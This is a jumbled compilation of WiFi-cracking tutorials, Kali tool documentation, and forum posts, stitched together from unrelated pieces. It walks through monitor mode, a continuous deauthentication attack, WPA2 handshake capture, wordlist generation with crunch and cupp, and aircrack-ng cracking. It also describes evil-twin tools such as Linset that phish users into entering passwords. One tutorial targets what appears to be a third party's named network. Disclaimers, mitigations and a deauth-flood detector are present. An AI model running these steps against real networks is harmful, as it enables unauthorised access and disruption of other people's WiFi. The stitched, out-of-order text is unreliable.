      EAPOL HMAC     : 28 A8 C8 95 B7 17 E5 72 27 B6 A7 EE E3 E5 34 45

Quitting aircrack-ng...
```
In the paper, the penetration testing software aircrack-ng tool group was used to attack the wireless network, and the wireless network password of WPA/WPA2 encryption mode was cracked in the Kali-Linux virtual experimental environment. After enumerating the operation methods of 26 uppercase and lowercase letters or 9 numbers to the n-power by using computers and password dictionaries, the WiFi password can be quickly obtained with the current high-speed development of computer hardware. This method has the advantages of simplicity, speed, stability, and high security.
Setting Up Our Practice Lab
Since we don’t want to try and hack any of our neighbors, we’ll set up a practice lab to hack into.
There is a caveat we want to mention before going further.
If you set up your actual router with a vulnerable password, you are putting your network at risk. We instead recommend finding an old router collecting dust that you can use solely for the purpose of this lab.
We also want to point out that if this router is in any way connected to your home network, it is still a vulnerable access point. You also run the risk of creating a rogue DHCP server, which can cause issues with your home network.
The best scenario is a separate router not connected to the internet or any other device in your home. All we need is for it to broadcast WiFi. We will connect a single wireless device to it for testing purposes, like a cellphone, when the time is right.
We can’t walk through the setup wizard for every possible router, but they all function similarly. Check your manufacturer’s website for details on logging into the administrator controls. Usually, you connect a computer physically to the router and go to 192.168.0.1 or a similar IP address.
If your router is in a factory default state, it will likely prompt you to set up your network.
There are a few specific settings we want to prepare.
First, set any network name you want. Some recommendations include:
- Drop_it_like_its_hotspot
- Panic_at_the_Cisco
- Keep_it_on_the_download
- Wi-Fight_this_feeling
Second, choose a password from the password list we mentioned in the previous section. In our lab, we went with w0rkplac3rul3s.
Lastly, make sure the security mode is set to WPA2-Personal.
Confirm you can discover this network with other devices, and you’re ready to go.
aircrack-ng Usage Examples
WPA Wordlist Mode
Specify the wordlist to use (-w password.lst) and the path to the capture file (wpa.cap) containing at least one 4-way handshake.
root@kali:~# aircrack-ng -w password.lst wpa.cap
                              Aircrack-ng 1.5.2
      [00:00:00] 232/233 keys tested (1992.58 k/s)
      Time left: 0 seconds                                      99.57%
                           KEY FOUND! [ biscotte ]
      Master Key     : CD D7 9A 5A CF B0 70 C7 E9 D1 02 3B 87 02 85 D6
                       39 E4 30 B3 2F 31 AA 37 AC 82 5A 55 B5 55 24 EE
      Transient Key  : 33 55 0B FC 4F 24 84 F4 9A 38 B3 D0 89 83 D2 49
                       73 F9 DE 89 67 A6 6D 2B 8E 46 2C 07 47 6A CE 08
                       AD FB 65 D6 13 A9 9F 2C 65 E4 A6 08 F2 5A 67 97
                       D9 6F 76 5B 8C D3 DF 13 2F BC DA 6A 6E D9 62 CD
      EAPOL HMAC     : 28 A8 C8 95 B7 17 E5 72 27 B6 A7 EE E3 E5 34 45
Basic WEP Cracking
To have aircrack-ng conduct a WEP key attack on a capture file, pass it the filename, either in .ivs or .cap/.pcap format:
root@kali:~# aircrack-ng all-ivs.ivs
                                 Aircrack-ng 1.4
                 [00:00:00] Tested 1514 keys (got 30566 IVs)
   KB    depth   byte(vote)
    0    0/  9   1F(39680) 4E(38400) 14(37376) 5C(37376) 9D(37376)
    1    7/  9   64(36608) 3E(36352) 34(36096) 46(36096) BA(36096)
    2    0/  1   1F(46592) 6E(38400) 81(37376) 79(36864) AD(36864)
    3    0/  3   1F(40960) 15(38656) 7B(38400) BB(37888) 5C(37632)
    4    0/  7   1F(39168) 23(38144) 97(37120) 59(36608) 13(36352)
             KEY FOUND! [ 1F:1F:1F:1F:1F ]
    Decrypted correctly: 100%
Before We Begin
There’s some background we need to cover before you can start hacking. This will include the necessary hardware, software, and an understanding of wireless technologies and dictionary attacks.
Required Hardware
To hack a wireless network, you need a wireless card with two features:
- Make sure your card supports monitor mode/promiscuous mode
- Make sure your card is capable of performing packet injection
We have bad news for you. It is almost certain that your onboard network card is incapable of this. You will need to purchase an external network adapter, and it has to have these specific (and uncommon) abilities.
For this article, we will be using Kali Linux with the ALFA AWUS036NEH Long Range adapter. This particular adapter is now end-of-life and discontinued, but it still serves its purpose. You can see our top choices for Kali Linux-compatible WiFi adapters here.
Specifically, we are using this adapter with Kali Linux 2022.4 running in VirtualBox on a Razer Blade 15 2018 Basic laptop.
Set Up Kali
If you don’t have Kali Linux installed, see our article How To Install Kali Linux on VirtualBox.
To connect your wireless adapter, follow these steps.
First, make sure your virtual machine instance is shut down.
Next, plug in your USB network adapter.
Now go to the VirtualBox manager. Select your Kali instance, click the list icon, and choose Details.
You will now see a page giving you various details about your virtual machine instance, such as the base memory, any shared folders connected to it, and the hard disk details.
Click on USB to bring up the USB settings menu. Now click the green plus sign on the right-hand side.
You want to add your new network adapter. It may not list the manufacturer, but instead list the chipset, as you can see in our image below. Once selected, click OK.
Back in the manager window, click Network this time. We want to disable all network adapters for this virtual machine, so untick Enable Network Adapter in all four tabs. Click OK. Now all communication will go through our wireless card.
Once done, Kali is ready.
Different Wireless Technologies
We won’t go into the entire history of the 802.11 wireless standards. Instead, we’re just going to talk about encryption.
There are several encryption types to choose from when securing a wireless network. Those include
- WEP
- WPA
- WPA2
- WPA2 Enterprise
WEP stands for Wired Equivalent Privacy. Despite the name, it is far from being as private as a wired connection. It is completely deprecated, as it can be hacked in literally seconds. Some routers still offer it as an option for legacy reasons. Never use it. Most businesses know better. If you see it on a penetration test, you can clock out early that afternoon, as it is the easiest wireless hack you'll ever perform.
The common encryption methods you will run into are WPA2 and WPA2 Enterprise. The difference between them, in a very high-level and simplified explanation, is that the Enterprise version has a separate login for every member of the domain. This means that instead of one password to access the WiFi for everyone (as you would see at home), each user has their own username and password.
Attacking WPA2 Enterprise is beyond the scope of this article. Many small to medium-sized businesses and almost all home routers are likely to be set to WPA2, which is what we will be hacking today.
What Are Dictionary Attacks?
A dictionary attack is the process of running through a preset list of words to see if any match the password you are looking to crack. For this, you need a password list to try.
This differs from a brute force attack, which tries every combination of characters based on the rules you prescribe. For example, if you know the password is between six and eight characters and contains upper and lower case letters and numbers but no special characters, the brute force attack might try “Aaaaa1,” “AAaaa1,” “AAAaa1,” etc., until it finds a match.
Each attack has its benefits and drawbacks. A dictionary attack is guaranteed to work eventually. The problem is a complex password (12 characters, upper and lower case letters with numbers and symbols) could literally take tens of thousands of years to crack with current technology. We doubt you’ll want to sit for this long looking to get WiFi access.
A dictionary attack is only as strong as its password list. However, if the password is on that list, the cracking will be much faster. There are many bad password policies in place, and while people are getting better at protecting their email and other online accounts, things like WiFi still take a back seat.
For our lab, we will be using a password list included with Kali Linux. You can find it here: /usr/share/wordlists/fern-wifi/common.txt
It contains 477 passwords, which is fine for our practice lab. When trying this for real, have many different password lists handy. Start with the smaller ones and hope for a quick win; if that doesn't work, try larger ones. You can also check whether the company has had a security breach before; you might find some passwords they've used in the past sitting online.
besside-ng
Attack WPA only (-W), display verbose output (-v) and use monitor mode interface wlan0mon.
root@kali:~# besside-ng -W -v wlan0mon
[18:39:34] mac 3c:46:d8:4e:ef:aa
[18:39:34] Let's ride
[18:39:34] Appending to wpa.cap
[18:39:34] Appending to wep.cap
[18:39:34] Logging to besside.log
[18:39:35] Found AP 44:3a:cb:38:51:42 [watwutwot] chan 1 crypto WPA dbm -49
[18:39:35] Found AP 4c:8b:30:83:ed:91 [TELUS3079-2.4G] chan 1 crypto WPA dbm -71
[18:39:35] Found AP 1c:87:2c:d3:34:18 [Kuroki] chan 3 crypto WPA dbm -89
[18:39:37] Found AP 4c:8b:30:24:71:75 [SAMUEL9] chan 8 crypto WPA dbm -73
[18:39:37] Found AP 0c:51:01:e6:01:c4 [fbi-van-24] chan 11 crypto WPA dbm -46
[18:39:37] Found AP 70:f1:96:8e:5c:02 [TELUS0455-2.4G] chan 11 crypto WPA dbm -78
[18:39:38] Found client for network [Kuroki] 90:06:28:cb:0f:f3
[18:39:41] Found AP f0:f2:49:3c:ec:a8 [fbi-van-24] chan 1 crypto WPA dbm -49
[18:39:42] Found AP bc:4d:fb:2c:6d:88 [SHAW-2C6D80] chan 6 crypto WPA dbm -77
[18:39:42] Found client for network [SHAW-2C6D80] 64:5a:04:98:e1:62
[18:39:43] Found AP 10:78:5b:e9:a4:e2 [TELUS2151] chan 11 crypto WPA dbm -49
[18:39:43] Found client for network [fbi-van-24] 60:6b:bd:5a:b6:6c
Conclusion
Let’s summarise what you’ve learned:
- Change the wireless adapter to monitor mode using airmon-ng
- Scan for the target AP using airodump-ng and capture the packets
- Perform a DoS (de-authentication) attack on the AP to get the handshake packets
- End the DoS once you have verified you captured the necessary packet
- Use aircrack-ng to generate PMKs to run against the handshake packets
Sometimes, the password may not be in the wordlist. In that case, there are many other ways to get the password such as an Evil Twin Attack or variations of what you have learned here. I also encourage you to practice this and many other attacks you discover out there, as this helps make you a master hacker.
Remember, this is strictly for educational purposes. Only perform this on others with their consent, or on your own devices.
And with that, we have come to the end of this article. Hope you enjoyed it. And as I always say, Happy hacking! 🙃
Resources
Acknowledgements
Thanks to Anuoluwapo Victor, Chinaza Nwukwa, Holumidey Mercy, Favour Ojo, Georgina Awani, and my family for the inspiration, support and knowledge used to put this post together. You’re my unsung heroes.
Cover photo credit: Lego Gentlemen working on a router from Wallpaperflare.com
Tool Documentation:
airodump-ng-oui-update Usage Example
airodump-ng-oui-update does not have any options. Run the command and wait for it to complete.
root@kali:~# airodump-ng-oui-update
/usr/sbin/update-ieee-data
Updating /var/lib/ieee-data//oui.txt
    Checking permissions on /var/lib/ieee-data//oui.txt
    Downloading https://standards.ieee.org/develop/regauth/oui/oui.txt to /var/lib/ieee-data//oui.txt
    Checking header
    Temporary location /tmp/ieee-data_y1vJ3E to be moved to /var/lib/ieee-data//oui.txt
    /var/lib/ieee-data//oui.txt updated.
Updating /var/lib/ieee-data//mam.txt
    Checking permissions on /var/lib/ieee-data//mam.txt
    Downloading https://standards.ieee.org/develop/regauth/oui28/mam.txt to /var/lib/ieee-data//mam.txt
    Checking header
    Temporary location /tmp/ieee-data_y1vJ3E to be moved to /var/lib/ieee-data//mam.txt
    /var/lib/ieee-data//mam.txt updated.
Updating /var/lib/ieee-data//oui36.txt
    Checking permissions on /var/lib/ieee-data//oui36.txt
    Downloading https://standards.ieee.org/develop/regauth/oui36/oui36.txt to /var/lib/ieee-data//oui36.txt
    Checking header
    Temporary location /tmp/ieee-data_y1vJ3E to be moved to /var/lib/ieee-data//oui36.txt
    /var/lib/ieee-data//oui36.txt updated.
Updating /var/lib/ieee-data//iab.txt
    Checking permissions on /var/lib/ieee-data//iab.txt
    Downloading https://standards.ieee.org/develop/regauth/iab/iab.txt to /var/lib/ieee-data//iab.txt
    Checking header
    Temporary location /tmp/ieee-data_y1vJ3E to be moved to /var/lib/ieee-data//iab.txt
    /var/lib/ieee-data//iab.txt updated.
Updating /var/lib/ieee-data//oui.csv
    Checking permissions on /var/lib/ieee-data//oui.csv
    Downloading https://standards.ieee.org/develop/regauth/oui/oui.csv to /var/lib/ieee-data//oui.csv
    Checking header
    Temporary location /tmp/ieee-data_y1vJ3E to be moved to /var/lib/ieee-data//oui.csv
    /var/lib/ieee-data//oui.csv updated.
Updating /var/lib/ieee-data//mam.csv
    Checking permissions on /var/lib/ieee-data//mam.csv
    Downloading https://standards.ieee.org/develop/regauth/oui28/mam.csv to /var/lib/ieee-data//mam.csv
    Checking header
    Temporary location /tmp/ieee-data_y1vJ3E to be moved to /var/lib/ieee-data//mam.csv
    /var/lib/ieee-data//mam.csv updated.
Updating /var/lib/ieee-data//oui36.csv
    Checking permissions on /var/lib/ieee-data//oui36.csv
    Downloading https://standards.ieee.org/develop/regauth/oui36/oui36.csv to /var/lib/ieee-data//oui36.csv
    Checking header
    Temporary location /tmp/ieee-data_y1vJ3E to be moved to /var/lib/ieee-data//oui36.csv
    /var/lib/ieee-data//oui36.csv updated.
Updating /var/lib/ieee-data//iab.csv
    Checking permissions on /var/lib/ieee-data//iab.csv
    Downloading https://standards.ieee.org/develop/regauth/iab/iab.csv to /var/lib/ieee-data//iab.csv
    Checking header
    Temporary location /tmp/ieee-data_y1vJ3E to be moved to /var/lib/ieee-data//iab.csv
    /var/lib/ieee-data//iab.csv updated.
Running parsers from /var/lib/ieee-data//update.d
airtun-ng Usage Examples
wIDS
Specify the BSSID of the access point you wish to monitor (-a DE:AD:BE:EF:CA:FE) and its WEP key (-w 1234567890).
root@kali:~# airtun-ng -a DE:AD:BE:EF:CA:FE -w 1234567890 wlan0mon
created tap interface at0
WEP encryption specified.
Sending and receiving frames through wlan0mon.
FromDS bit set in all frames.
airgraph-ng Usage Examples
CAPR graph
Specify the input file to use (-i dump-01.csv), the output file to generate (-o capr.png) and the graph type (-g CAPR).
root@kali:~# airgraph-ng -i dump-01.csv -o capr.png -g CAPR
**** WARNING Images can be large, up to 12 Feet by 12 Feet****
Creating your Graph using, dump-01.csv and writing to, capr.png
Depending on your system this can take a bit. Please standby......
CPG graph
Specify the input file to use (-i dump-01.csv), the output file to generate (-o cpg.png) and the graph type (-g CPG).
root@kali:~# airgraph-ng -i dump-01.csv -o cpg.png -g CPG
**** WARNING Images can be large, up to 12 Feet by 12 Feet****
Creating your Graph using, dump-01.csv and writing to, cpg.png
Depending on your system this can take a bit. Please standby......
What is a Packet?
A Packet is the basic unit/building block of data in a computer network. When data is transferred from one computer to another, it is broken down and sent in packets.
Think of packets like Lego building blocks. You (the computer) receive the complete set (the complete data) in pieces (packets) from the seller (another computer). You will then assemble the blocks together to build up the figure based on the instructions given in order to enjoy it (or in this case, for the whole data to make sense).
A packet, also known as a datagram, is made up of two basic parts:
- A Header
- The Payload/Data
The Header contains information about the packet, such as the source and destination IP addresses. This helps the network and the receiving computer know what to do with it.
The Payload is the main content the packet carries. It's also worth mentioning that packets can be encrypted so that their data can't be read if intercepted by an attacker.
In a network, packets are a requirement for packet switching. Packet switching means breaking down data into packets and sending them to various computers using different routes. When received, the computers can then assemble these packets to make sense of it all. The Internet is the largest known packet switching network on earth.
Now let’s see how we can apply this knowledge to wireless networks.
Mitigations Against WiFi Attacks
Basic Wi-Fi security should cover this attack from a defensive perspective. Using WPA3, which is a newer protocol, is your best bet against such an attack. To mitigate de-authentication attacks, use an Ethernet connection if possible.
Assuming that option is not on the table, you can use a strong passphrase (not a password) to minimise the attacker's chances of getting it. A passphrase is simply a string of words used as a password. Passphrases tend to be longer than passwords, easier to remember, and a rarer practice. Therefore, they will hardly ever be found in wordlists.
For example, 'mercury' is more likely to be found in a wordlist than 'mercurylovespluto'. The latter is a 15-character passphrase and, as simple as it is, it would be hard for an attacker to find, guess, or generate.
Another mitigation is to disable WPS (Wi-Fi Protected Setup) and to avoid, under any circumstances, using a router that uses the WEP protocol. You'd just be asking for unwanted attention, as both of these are a lot easier to hack than WPA2.
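The de-authentication flood this section asks you to mitigate is also easy to detect from the defender's side, because a genuine access point sends deauth frames rarely and to one station at a time. The following is an added example, not code from the article, that runs a sliding-window detector over a constructed sample of 802.11 management-frame records. The record layout (timestamp, subtype, BSSID, destination MAC) and the locally administered sample MACs are assumptions made for the demo; a real feed would be decoded from a monitor-mode capture instead of written inline.

```python
"""Sliding-window detector for 802.11 de-authentication floods.

Added example (not from the article). The frame record format and the
sample MAC addresses below are constructed for illustration only.
"""
from collections import defaultdict, deque

BROADCAST = "ff:ff:ff:ff:ff:ff"


def detect_deauth_floods(frames, window_s=1.0, threshold=10):
    """frames: iterable of (timestamp_seconds, subtype, bssid, dst_mac).

    Keeps a sliding window of deauth frames per BSSID and raises one alert
    per BSSID the first time more than `threshold` of them fall inside
    `window_s` seconds. A burst addressed to the broadcast MAC is the
    strongest signal, since legitimate deauths are unicast and infrequent.
    Returns a list of (bssid, window_start, count, broadcast_seen).
    """
    recent = defaultdict(deque)
    alerted = set()
    alerts = []
    for ts, subtype, bssid, dst in sorted(frames, key=lambda f: f[0]):
        if subtype != "deauth":
            continue
        window = recent[bssid]
        window.append((ts, dst))
        while window and ts - window[0][0] > window_s:
            window.popleft()  # drop frames that have aged out of the window
        if len(window) > threshold and bssid not in alerted:
            alerted.add(bssid)
            alerts.append((bssid, window[0][0], len(window),
                           any(d == BROADCAST for _, d in window)))
    return alerts


# Constructed sample (locally administered MACs, not real devices): a beacon,
# one ordinary unicast deauth, a 30-frame broadcast deauth burst from the lab
# AP spanning 1.5 s, and a single unrelated deauth from a second AP.
LAB_AP = "02:00:00:00:00:01"
OTHER_AP = "02:00:00:00:00:02"
SAMPLE_FRAMES = (
    [(0.0, "beacon", LAB_AP, BROADCAST),
     (0.5, "deauth", LAB_AP, "02:00:00:00:00:10")]
    + [(1.0 + i * 0.05, "deauth", LAB_AP, BROADCAST) for i in range(30)]
    + [(2.0, "deauth", OTHER_AP, "02:00:00:00:00:11")]
)

if __name__ == "__main__":
    for bssid, start, count, bcast in detect_deauth_floods(SAMPLE_FRAMES):
        print(f"ALERT {bssid}: {count} deauth frames within 1 s from "
              f"t={start:.2f} s{' (broadcast)' if bcast else ''}")
```

Detection is a fallback, not the fix: Protected Management Frames (802.11w), which WPA3 requires, let clients discard deauth frames that were not sent by the real access point, which is why the WPA3 recommendation above removes the attack rather than merely surfacing it.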
Disclaimer
We want to be absolutely clear on this point. As much fun as it might seem to hack into your neighbor’s wireless network or a secured network at a friend’s house, hotel, or other location, don’t do it. You need to have permission from the network owner if you are to do any kind of hacking or penetration testing on their systems.
It might not seem like a big deal, but hacking a system without permission can hold extremely steep legal penalties, including jail time, depending on your location. Such laws include:
- The Computer Fraud and Abuse Act (United States)
- Sections 184, 342.1, 380, and 430 of the Criminal Code of Canada (Canada)
- Computer Misuse Act 1990 (England)
- Sec. 202a and 202b of the German Criminal Code (Germany)
- Information Technology Act Sec. 43 and 66 (India)
- The Act on the Prohibition of Unauthorised Computer Access (Japan)
wesside-ng Usage Example
Use the specified monitor mode interface (-i wlan0mon) and target a single BSSID (-v de:ad:be:ef:ca:fe):
root@kali:~# wesside-ng -i wlan0mon -v de:ad:be:ef:ca:fe
[18:31:52] Using mac 3C:46:D8:4E:EF:AA
[18:31:52] Looking for a victim...
[18:32:13] Chan 04 -
Screenshots
fern-wifi-cracker
Packages and Binaries:
fern-wifi-cracker
This package contains a wireless security auditing and attack program written in Python using the Python Qt GUI library. The program can crack and recover WEP/WPA/WPS keys and also run other network-based attacks on wireless or Ethernet-based networks.
Installed size:
1.13 MB
How to install:
sudo apt install fern-wifi-cracker
- aircrack-ng
- macchanger
- python3
- python3-pyqt5
- python3-scapy
- reaver
- subversion
- xterm | x-terminal-emulator
fern-wifi-cracker
Updated on: 2022-Aug-05
General discussion about hacking WiFi with Kali Linux 2019.3
Hi everyone, I have a question about hacking WiFi with Kali Linux.
From what I have researched and actually tested, there are 2 main hacking methods:
They are
1. Hacking using a dictionary
- Advantages: works on WiFi with common passwords and little security
- Disadvantages: needs dictionaries of 2-3 GB, takes time to load and scan; if the password is not in the dictionary you lose time and are left disappointed after waiting in hope
- Advantages: hit fast, win fast, no long waiting like method 1
- Disadvantages: based on the tools I have used, such as fluxion, wifiphisher and most recently airgeddon (all available on GitHub), my assessment is that they are not really as effective as I once thought
- Specifically, everything from the start up to capturing the handshake and faking a WiFi with the same SSID as the original is OK; then I took out my phone to test, confirmed the fake WiFi was visible, and to be sure I also tested by tapping the fake WiFi and connecting all the way to the password entry screen, which was still OK; however, after that I waited forever without seeing any client log in, even though, as far as I observed, all the tools above open a terminal that sends deauth packets via mdk3 or aireplay-ng to the clients already connected to the original WiFi, to push those clients off the original WiFi so they have to go into their smartphone settings and reconnect to the fake WiFi.
- I am thinking that in reality the clients have not been pushed off the original WiFi >> My conclusion is that this method 2 is not really optimal
Now I need the PROs to advise on why that is, and if there is a more optimal method, please advise.
Many thanks to you all.
(Note: my house has WiFi too, and I tested on my own home WiFi; I did see it get kicked off the original WiFi, but then it reconnected by itself. Also, since my house already has WiFi, this hacking is just my own curiosity and passion for tinkering, so please don't throw stones at me, poor me.)
DDos
[Kali Linux 2.0] Linset — Crack WPA/WPA2 WiFi passwords without brute force
If you are using Kali Linux 1.x, see this topic.
Linset is a bash script written by a Spaniard to automate the process of cracking WiFi passwords without using a wordlist. The idea is to create a fake access point using airbase-ng to trick the user into connecting to it. You will not be able to connect to the real access point because aireplay-ng has sent de-authentication packets to it. When the user connects to the fake access point, they can still access the Internet normally (if the attacker has intentions beyond getting the WiFi password). If the goal is only to get the WiFi password, then when the user visits any web address, their browser is redirected to a web page the attacker has set up in advance, which asks them to enter the WiFi password of this access point (because the real access point can no longer be connected to and the fake AP looks identical to the real one, users are easily confused). When they enter the correct password of the real AP, Linset finishes running and displays the password of this access point. The nice thing about this script is that you only need 1 WiFi card to use it; it does not require 2 WiFi cards like other tools (wifiphisher, ...).
Unfortunately, Linset only works on Kali Linux 1.x (or more precisely, it is compatible with the old version of aircrack-ng). The other day, while wandering around a Kali Linux forum in Indonesia, I saw that they had edited this script so it works well on Kali Linux 2.0. You can download it here. The script was originally in Spanish but has been translated into English.
Requirements to run Linset:
- Kali Linux 2.0 (or any Linux distribution with aircrack-ng installed)
- 1 wireless card
- 1 wired Internet connection
This tool is very easy to use; you just pick and pick and you are done. I made a demo of this tool:
Cyber Security Tool For Hacking Wireless Connections Using Built-In Kali Tools. Supports All Securities (WEP, WPS, WPA, WPA2/TKIP/IES) hacking is not a crime it’s a skills .
Introduction
How do you hack a WiFi password? Surely many of you are interested in this question. Today I will write a tutorial on hacking WiFi passwords with Kali Linux.
There are currently three WiFi security standards in use: WEP, WPA and WPA2. If you have ever opened your router's configuration page (usually at 192.168.1.1), you can choose one of these three standards. WEP is obsolete and almost never used in practice any more, so I will not present the WEP attack method here. Under the right conditions, WEP WiFi can be hacked in a few minutes with a 99% success rate; the attack relies on flaws in the security standard itself.
WPA2 is the newest standard; the main attack method relies on a wordlist, so the success rate depends on the strength of the password the admin set. However, in 2017 security researchers discovered a serious vulnerability in the WPA2 standard and introduced the KRACK (Key Reinstallation Attack) method, which means WPA2 is no longer safe.
In early 2018, the developers introduced the new WPA3 security standard, and in the future hardware vendors will update to this new standard. Rest assured, though, that WPA3 will not be widespread worldwide within the next 5 years, and the WPA/WPA2 attack method in this article will not be obsolete for at least 5 more years 🙂
Attack Method
This section is theoretical and will help you understand how the attack unfolds.
When a client wants to connect to a router configured with WPA/WPA2 security in order to access the internet, it needs the PSK (Pre-shared Key), which we usually call the password. The client needs a way to prove to the router that it knows the password without sending the password to the router directly (to prevent a third party from capturing that packet and obtaining the password). The authentication process has four steps (the 4-way handshake):
- The client scans for networks and sees the router's public broadcast, which contains a random value called the ANonce.
- The client takes the ANonce, computes the SNonce, and sends the SNonce, together with some encrypted information such as who it is and that it has the WiFi password, to the router.
- The router receives the SNonce and says: aha, this one knows the WiFi password, let it connect. It eagerly sends the client a shared key called the GTK (Group Temporal Key) and says: hey buddy, take this key and use it to encrypt the data you send me, and I will know how to decrypt it.
- The client receives the GTK, saves it (installation), and immediately uses it to encrypt a message back to the router with an ACK telling the router that it got the key. From then on the two use this shared key to send and receive data.
The attack method here is to capture the packets of this 4-way handshake to obtain the password in hashed form. There is no way to recover the original password from this hash, because it is a one-way function. This is where the Wordlist Attack comes in: we create a wordlist of candidate passwords and convert them into hashes, then compare each hash with the captured hash to deduce the original password. OK, that is all the theory; let's start the practice.
Preparation
To apply the attack method in this article, you need the following:
- The Kali Linux operating system (update to the latest version to optimize the attack).
- A laptop with a WiFi card that supports monitor mode (search Google to check).
- The aircrack-ng suite for hacking WiFi (preinstalled on Kali Linux).
- A good wordlist (password dictionary), which you can download from the internet or generate yourself with programs such as crunch, cupp, ...
- A little luck 🙂
Let's begin!
Attack – Step 1: Capture the 4-way Handshake packets.
First, in Kali Linux, open a Terminal and type the following command to see the network cards in the machine:
ifconfig
As shown in the image above, eth0 is the wired network card, lo can be ignored, and wlan0 is the wireless card we will use for hacking. You can see that the Kali machine's IP address (if you have connected to WiFi) is 192.168.12.109 and its MAC address is 56:0F:1C:93:EB:B2.
A wireless card has 2 modes. The default mode is Managed, in which the card only receives packets sent over the air whose destination address is our machine. The other mode is Monitor, in which the card receives all packets sent by other wireless cards within range, regardless of the destination address.
To switch to Monitor mode, type
airmon-ng start wlan0
The wireless card will then be renamed wlan0mon; you can run
ifconfig
again to check the network cards.
Next, type the following command so the card sniffs packets in the air to identify the APs (Access Points) and the clients connected to them.
airodump-ng wlan0mon
The upper part lists the APs detected; the lower part lists the clients connected to those APs. Note the ESSID column, which is the AP's name; the ENC column shows the encryption method (you can see that WPA2 is the majority and there is almost no WEP); CH is the channel the AP broadcasts on; BSSID is the AP's MAC address.
Once you have found the target AP to attack, press Ctrl + C to stop the scan. Here I choose the AP with ESSID "Ngoai Tieu Hoa". Type the following command to capture only the packets belonging to the AP we want:
airodump-ng --bssid B0:48:7A:9A:E6:36 -c 4 -w ngoaitieuhoa wlan0mon
Where:
- B0:48:7A:9A:E6:36 is the AP's MAC address
- -c 4 is the channel the AP broadcasts on
- -w ngoaitieuhoa is the name of the file we want to write
- wlan0mon is the name of the WiFi card in monitor mode
The command above captures packets to and from the AP with MAC address B0:48:7A:9A:E6:36 on channel … and writes the captured packets to a .cap file whose name begins with ngoaitieuhoa…
Now we wait: when a client connects to the AP, the 4-way handshake will be captured and the text "WPA Handshake" will appear in the top-right corner of the terminal. The file ngoaitieuhoa…cap will be saved in /root.
To make sure this eavesdropping succeeds, open another terminal and type the following command to disconnect the clients currently connected to the AP. The clients will then redo the 4-way handshake and we will capture the packets we need.
aireplay-ng --deauth 0 -a B0:48:7A:9A:E6:36 wlan0mon
Where:
- --deauth 0: perform the disconnection attack continuously against this network's clients.
- -a B0:48:7A:9A:E6:36 is the AP's MAC address.
- wlan0mon is the name of the wireless card in monitor mode.
Watch the window running airodump-ng; when "WPA Handshake" appears, step 1 (packet capture) is complete. You can press Ctrl + C in each window to stop the commands.
Attack – Step 2: Wordlist
The next step of the attack is a wordlist attack, so we need a good dictionary.
Kali already ships with a number of wordlists, for example rockyou.txt at /usr/share/wordlists/rockyou.txt or John the Ripper's wordlist at /usr/share/john/password.lst, … but most of these wordlists are not well suited to Vietnamese users because of the differences in language.
Some ready-made wordlists for Vietnamese users can be downloaded from the following link:
https://drive.google.com/drive/folders/1xucDD6sy6DTH-IAvKdaVQkAkI3tSHfIe
Or you can build your own wordlist with the crunch program that comes with Kali Linux.
The following command generates a wordlist of all 8-digit numbers (a common kind of password at cafés) in a few seconds:
crunch 8 8 0123456789 -o wordlist8so.txt
The wordlist just created is 858 MB! You can learn more about crunch by typing
crunch --help
Another neat way to build a wordlist is cupp, written in Python, which generates a wordlist from information about the target such as full name, date of birth, partner's name, pet's name, … Read more here:
https://hackingvision.com/2017/12/13/cupp-target-specific-wordlist-generator/
Once you have a wordlist, move on to step 3. Note that you will probably have to try several wordlists, depending on your luck.
Attack – Step 3: Crack
This step needs just one simple command:
aircrack-ng ngoaitieuhoa-01.cap -w wordlist8so.txt
This command computes the hash for each password in the wordlist and compares it against the hashed password captured in ngoaitieuhoa-01.cap. Replace wordlist8so.txt with the path to the wordlist prepared in step 2. Test results on the author's machine:
The cracking speed on the author's machine (Core i5 CPU, 4 GB RAM) is about 2400 keys/s. So searching the entire 8-digit wordlist takes at most about 10^8 / 2400 / 3600 ≈ 12 hours (be patient :)). When the password is found, the program displays Key Found: … and shows you the password.
Closing remarks
As you can see, the cracking speed above is quite slow. There are several ways to speed it up, such as using the power of the graphics card (GPU) or cloud computing. I will cover them in another article if I get the chance.
The attack above relies on a wordlist, so its success rate is not very high. In the next article I will introduce a different attack, based on the router's WPS feature.
Good luck with aircrack-ng 🙂
When it comes to learning pentesting, one of the most frequently asked questions we receive is, “how do I hack WiFi?” It is often the first hands-on challenge aspiring hackers want to try. Your being here is proof positive.
That’s great! Hacking WiFi is a fantastic exercise. It’s a chance for you to learn command line tools, wireless protocols, enumeration, and password cracking. In this article, we’ll teach all these things to you. We’ll discuss the technology, how the attacks work, and what hardware you need. Finally, we’ll set up a lab and practice it together.
So get ready because we’re going to teach you how to hack WiFi with Kali Linux.
How to Hack WiFi With Kali Linux
We’re now going to go through the step-by-step process of hacking a WPA2-Personal WiFi network.
There are several programs we can use, but this article will only focus on using the Aircrack-NG suite of tools. We encourage you to try some of the other tools mentioned in the Frequently Asked Questions.
Promiscuous Mode
In most cases, a network card only listens for traffic sent to its MAC Address. Promiscuous mode (also called monitor mode) tells the card to listen to all traffic, not just traffic directed to it.
Let’s switch to root using the command sudo su. You will be prompted for your Kali password.
Use ifconfig to see what our network card is. We see below it’s wlan0.
Using iwconfig we see the adapter is currently in managed mode (not monitor).
We will use Airmon-NG to put the adapter into monitor mode.
First, we end any processes that might interfere using the command
airmon-ng check kill
Then change the adapter’s mode using
airmon-ng start wlan0
Use whatever your adapter name is, if different. Your adapter name will change, adding the letters “mon” to the end (for monitor). In our case, it became wlan0mon.
Scanning For Networks
Now that we are in monitor mode, we can begin scanning. We will use the program Airodump-NG, with the -i flag to indicate the interface to listen on, then the name of our interface (which in our case is wlan0mon).
airodump-ng -i wlan0mon
We are picking up all kinds of traffic. Let’s examine what we see.
- BSSID is the MAC address of the access points we can see.
- CH is the channel they are running on (WPA2 typically runs on channel 1, 6, or 11).
- ENC is the encryption method. In this picture we see two open networks, and many WPA2.
- AUTH is the authentication method used to connect to the network. PSK stands for pre-shared key.
- ESSID is the common name of the wireless network. We can see our target network, as well as the MAC address and the channel it is running on.
- STATION lists the MAC address of devices connected to the different networks.
Capturing Traffic
Now that we know our target’s BSSID, let’s capture packets only going to our target and save it as a capture file. We will use Airodump-NG again, with the --channel flag to indicate the channel to listen on, the --bssid flag to let it know what device to listen to, and the --write flag to name the capture.
airodump-ng --channel 1 --bssid EC:AD:E0:AB:93:34 --write HackDump wlan0mon
All the data is now being saved to a capture file. We can see one device connected to this network (the phone we connected to this access point – connect a device if you haven’t already).
